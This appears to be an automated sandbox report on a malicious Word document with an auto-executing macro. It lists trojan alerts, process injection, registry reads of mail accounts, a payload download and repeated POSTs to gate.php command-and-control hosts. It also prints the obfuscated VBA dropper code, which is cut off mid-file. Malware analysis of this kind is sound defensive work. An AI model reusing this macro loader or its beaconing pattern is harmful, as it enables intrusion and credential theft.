bad.doc
This report is generated from a file or URL submitted to this webservice on August 8th 2017 17:07:25 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v6.90 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access: Tries to identify its external IP address
- Spyware: POSTs files to a webserver
- Stealer/Phishing: Scans for artifacts that may help identify the target; Touched instant messenger related registry keys
- Persistence: Spawns a lot of processes; Writes data to a remote process
- Fingerprint: Reads the active computer name; Reads the cryptographic machine GUID; Scans for artifacts that may help identify the target; Tries to identify its external IP address
- Evasive: Detected document macro trying to fingerprint/evade the analysis environment
- Network Behavior: Contacts 5 domains and 5 hosts.

Additional Context
Related Sandbox Artifacts
- Associated URLs
Indicators
Not all malicious and suspicious indicators are displayed.

Malicious Indicators (18)

Environment Awareness

Detected document macro trying to fingerprint/evade the analysis environment
- details: Document contains auto-execute macro and tries to obtain external IP/ISP/host information
- source: Indicator Combinations
- relevance: 10/10

External Systems

Detected Emerging Threats Alert
- details:
Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 2" (SID: 2014411, Rev: 10, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 2, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN Trojan Generic - POST To gate.php with no referer" (SID: 2017930, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Win32/Terdot.A / Zloader Checkin" (SID: 2809511, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ETPRO TROJAN Tordal/Hancitor/Chanitor" (SID: 2819978, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)" (SID: 2016858, Rev: 9, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 3/58 Antivirus vendors marked sample as malicious (5% detection rate)
- source: External System
- relevance: 8/10

General

Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10

GETs files from a webserver
- details:
"GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache"
"GET /wp-content/plugins/easyrotator-for-wordpress/3 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ariegenet.fr
Cache-Control: no-cache"
- source: Network Traffic
- relevance: 10/10

Installation/Persistence

Writes data to a remote process
- details:
"WINWORD.EXE" wrote 32 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 52 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 4 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 1024 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 7680 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 3072 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"WINWORD.EXE" wrote 8704 bytes to a remote process "%WINDIR%\System32\svchost.exe" (Handle: 1380)
"BNEBB1.tmp" wrote 32 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100)
"BNEBB1.tmp" wrote 52 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100)
"BNEBB1.tmp" wrote 4 bytes to a remote process "%WINDIR%\explorer.exe" (Handle: 100)
- source: API Call
- relevance: 6/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details:
Found malicious artifacts related to "23.21.223.243" (ASN: , Owner: ): ...
Found malicious artifacts related to "213.186.33.19" (ASN: , Owner: ): ...
- source: Network Traffic
- relevance: 10/10

Tries to identify its external IP address
- details: "api.ipify.org"
- source: Network Traffic
- relevance: 6/10

Spyware/Information Retrieval

Scans for artifacts that may help identify the target
- details:
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
"svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK")
- source: Registry Access
- relevance: 3/10

Touched instant messenger related registry keys
- details: "svchost.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
- source: Registry Access
- relevance: 5/10

Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details: Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source: Static Parser
- relevance: 10/10

Contains embedded string that indicates auto-execute behavior
- details: Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source: File/Memory
- relevance: 10/10

Contains native function calls
- details: NtQueryInformationProcess@NTDLL.DLL from BNEBB1.tmp (PID: 1584)
- source: Hybrid Analysis Technology
- relevance: 5/10

Spawns a lot of processes
- details: Spawned process "WINWORD.EXE" with commandline "/n "C:\7ef3892eaa887c7f4234754ecd8adfc9a5d2df9b15bf2ac0df9d8f9a878dee38.doc", Spawned process "svchost.exe", Spawned process "cmd.exe" with commandline "cmd /K", Spawned process "svchost.exe", Spawned process "BNEBB1.tmp", Spawned process "explorer.exe"
- source: Monitored Target
- relevance: 8/10

Hiding 4 Malicious Indicators

Suspicious Indicators (18)

Anti-Detection/Stealthiness

Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details:
"svchost.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
"explorer.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source: Registry Access
- relevance: 3/10

Environment Awareness

Reads the active computer name
- details:
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"svchost.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"explorer.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10

Reads the cryptographic machine GUID
- details:
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"svchost.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"explorer.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10

External Systems

Detected Emerging Threats Alert
- details: Detected alert "ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)" (SID: 2016173, Rev: 8, Severity: 2) categorized as "Potentially Bad Traffic" (Backdoor, ransomware, trojans, etc.)
- source: Suricata Alerts
- relevance: 10/10

General

Opened the service control manager
- details:
"svchost.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"explorer.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10

POSTs files to a webserver
- details:
"POST /ls5/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: cethenjustte.com
Content-Length: 111
Cache-Control: no-cache" with no payload
"POST /mlu/forum.php HTTP/1.0
Host: cethenjustte.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 205
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" with no payload
"POST /d2/about.php HTTP/1.0
Host: cethenjustte.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 233
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 261
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 1034
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1107
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 561
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 780
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 577
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 799
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 929
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 686
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 643
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 432
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 582
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: tingotosling.com
Content-Length: 1041
Connection: Close" with no payload
"POST /bdl/gate.php HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: keportsitno.com
Content-Length: 256
Connection: Close" with no payload
- source: Network Traffic
- relevance: 5/10

Requested access to a system service
- details:
"svchost.exe" called "OpenService" to access the "rasman" service
"svchost.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"svchost.exe" called "OpenService" to access the "RASMAN" service
"svchost.exe" called "OpenService" to access the "ProtectedStorage" service
"svchost.exe" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights
"svchost.exe" called "OpenService" to access the "VaultSvc" service
"explorer.exe" called "OpenService" to access the "rasman" service
"explorer.exe" called "OpenService" to access the "Sens" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
"explorer.exe" called "OpenService" to access the "RASMAN" service
- source: API Call
- relevance: 10/10

Sent a control code to a service
- details: "svchost.exe" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
- source: API Call
- relevance: 10/10

Installation/Persistence

Drops executable files
- details: "BNEBB1.tmp" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source: Binary File
- relevance: 10/10

Network Related

Uses a User Agent typical for browsers, although no browser was ever launched
- details: Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- source: Network Traffic
- relevance: 10/10

System Security

Modifies proxy settings
- details:
"svchost.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"svchost.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"svchost.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"explorer.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"explorer.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10

Queries sensitive IE security settings
- details:
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
"explorer.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source: Registry Access
- relevance: 8/10

Unusual Characteristics

Contains embedded VBA macros with suspicious keywords
- details: Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
- source: Static Parser
- relevance: 10/10

Reads information about supported languages
- details:
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
"svchost.exe" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "LOCALENAME")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
- source: Registry Access
- relevance: 3/10

Hiding 4 Suspicious Indicators

Informative (16)

Environment Awareness

Reads the registry for installed applications
- details:
"WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
"WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103")
- source: Registry Access
- relevance: 10/10

General

Contacts domains
- details:
"api.ipify.org"
"cethenjustte.com"
"ariegenet.fr"
"tingotosling.com"
"keportsitno.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
"23.21.223.243:80"
"86.110.117.167:80"
"213.186.33.19:80"
"185.42.14.83:80"
"185.133.42.219:80"
- source: Network Traffic
- relevance: 1/10

Contains embedded VBA macros
- details:
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub avifauna()
Dim acrogen As Long
Dim deterrent As Long
affectingly.tuille.Value = Day(#12/5/2013#)
varday = moles = "scindapsus"
hedged = "brilliant"
doxy = "gabon"
melilotus = "dendranthema"
timetable = "acridotheres"
necrosis = "insinuate"
glyphography = "dryopteridaceae"
Set aquaplane = affectingly.tuille.SelectedItem
tranquil = 80 + 4
convergence = 36430 + 1
slogan = 178500 + 6
Pmt 0, tranquil, 22310, 24297, 2
gunnysack = aquaplane.Name
ranales = 7840 + 4
sermonize = Right(gunnysack, ranales)
beetlehead = jacks.ounce(sermonize)
selenipedium = 110 + 6
repartee = 33910 + 6
closeknit = 482150 + 7
Pmt 0, selenipedium, 15519, 49177, 5
fenugreek = "umbelliferae"
exocentric = "spondaic"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim nope As Long
Dim kampong As LongPtr
Dim someday As LongPtr
Dim future As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim oyez As Integer
Dim someday As Long
Dim accouplement As String
Dim kampong As Long
#End If
breastwork = 27 - 56 + 29
mountebank = "armoire"
psaltriparus = "shoehorn"
climbing = 4090 + 6
catkinate = 4 + 4
excrete = 12710 + 6
finnish = 522920 + 8
Pmt 0, catkinate, 36245, 46809, 2
brachygraphy = "benghazi"
escarpment = accomodation
homespun = 20 + 8
aceite = 20800 + 9
maleficent = 535250 + 7
Pmt 0, homespun, 2344, 52505, 8
nairne = beetlehead
kampong = embodiment(nairne)
salviniaceae = "camshaft"
sanctorum = "bunko"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim empires As Integer
Dim dangle As LongPtr
Dim outvie As LongPtr
Dim apar As LongPtr
pinacotheca = 62 - 85 + 2087
#End If
agonies = "brooms"
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim dangle As Long
ea = 33 + 28 + 720
Dim outvie As Long
Dim apar As Long
pinacotheca = ea + 3459
#End If
Dim husbandry As Byte
Dim antacid As Long
dangle = 4 - 4
someday = kampong + pinacotheca
outvie = 58 + 30 + 201439
apar = 15 + 3485
philosophically = bizons(outvie, dangle, someday)
yesterdays = 20 + 6
motor = 16900 + 3
bleed = 378590 + 5
Pmt 0, yesterdays, 38716, 33503, 8
End Sub
Function embodiment(procacity)
Dim disconsolate As Variant
Dim schematic As Long
Dim agelaius As Variant
Dim twirl As Variant
trums = pinochet(20 / 4)
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim cross As Long
Dim freezes As LongPtr
domino = 76 - 80 + 12
Dim profitlessly As LongPtr
Dim cacao As Variant
Dim leucadendron As Integer
Dim antigone As LongPtr
Dim avian As Long
#End If
#If (6 * 3 + 5) > (7 - 2 * 1) And Not (48 - 6 * 8) * 2 < (Win64) Then
Dim freezes As Long
domino = 37 - 43 + 10
Dim profitlessly As Long
Dim antigone As Long
#End If
rotationally = VarPtr(freezes)
veniable = kingbolt(rotationally, VarPtr(procacity) + 8, domino)
inamorato = 20 + 117 - 138
profitlessly = 3 - 3
baptismal = 4 - 4
antigone = 90 + 9677
wimpy = 4090 + 6
memorials = 64 + 0
insolently = filefish(ByVal inamorato, profitlessly, ByVal baptismal, antigone, ByVal wimpy, ByVal memorials)
subsystem = Rnd(114)
disengaged = "crawling"
kingbolt profitlessly, freezes, 116 + 6 + 5761
las = 50 + 8
sharplimbed = 8050 + 2
supine = 305820 - 10
Pmt 0, las, 14597, 30094, 6
embodiment = profitlessly
End Function
Function kingbolt(agonus, condyle, chromolithography)
trums = pinochet(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (trums) > (20 - 5 * 4) * 2 Then
Dim ambystomid As String
Dim sniggle As String
Dim meteoromancy As LongPtr
Dim fiscalize As LongPtr
Dim equivocalness As LongPtr
Dim diablerie As Byte
Dim adjudication As LongPtr
Dim bengal As LongPtr
#End If
#If (7 * 4 + 5) > (7 - 2 * 1) And Not (20 - 5 * 4) * 2 < (trums) Then
Dim fiscalize As Long
Dim inclination As Byte
Dim meteoromancy As Long
Dim flier As Variant
Dim adjudication As Long
Dim olivebrown As Byte
Dim equivocalness As Long
Dim concamerate As Variant
Dim bengal As Long
Dim scorn As Long
Dim gallicism As Integer
#End If
First = First + 179
subsystem = Fix(220)
fiscalize = agonus
bengal = chromolithography
subsystem = Rnd(252)
adjudication = condyle
mokes = 110 + 3
glowing = 31390 + 6
vitaceae = 227950 + 10
Pmt 0, mokes, 14252, 40057, 7
First = First Or 490 + 7
meteoromancy = 22 + 1 - 24
riesling ByVal meteoromancy, fiscalize, adjudication, bengal, equivocalness
First = Rnd(89)
End Function
Private Sub Document_Open()
Dim phonics As Long
Dim estrone As Integer
scissure = "pion"
inquirendum = ancora
avifauna
summary = 30 + 2
ligible = 33780 + 3
conglutinate = 504440 + 10
Pmt 0, summary, 14997, 24917, 5
End Sub"
File "jacks.bas" (Streampath: "Macros/VBA/jacks") has code: "' Then you rolled in with your hair in the wind
' Rain was driving, thunder, lightning
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
' Driving us to your house
' And hit me like a hurricane
Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long
' I was doing alright
' We locked eyes over whiskey on ice
' We locked eyes over whiskey on ice
' Driving us to your house
